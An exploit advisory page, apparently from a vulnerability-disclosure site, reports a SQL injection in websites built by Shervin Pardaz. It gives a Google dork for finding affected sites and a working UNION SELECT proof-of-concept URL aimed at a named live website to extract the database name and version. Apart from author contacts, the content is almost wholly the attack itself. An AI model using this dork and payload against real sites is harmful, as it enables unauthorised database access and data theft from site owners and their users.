Shervin Pardaz SQL Injection

Published
Credit
Risk
2017.08.02
Dmitriy_Area51
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: intext:"Designed by Shervin pardaz"

# Exploit Title: Shervin Pardaz SQL Injection
# Data: 2 Aug 2017
# Exploit Author: Dmitriy_Area51
# Vendor HomagePage: http://www.shervinpardaz.ir
# Tested on: Ubunto / FireFox
# Google Dork: intext:"Designed by Shervin pardaz"
=========
POC:
=========
http://azinpowder.ir/en/single-product.php?id=-18+UNION+SELECT+1,2,3,4,5,6,7,8,9,group_concat(database(),0x3a,version()),11,12--
=========
Contact Me :
=========
Telegram : @Dmitriy_Area51
Email : Dmitriy_Area51@yahoo.com


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com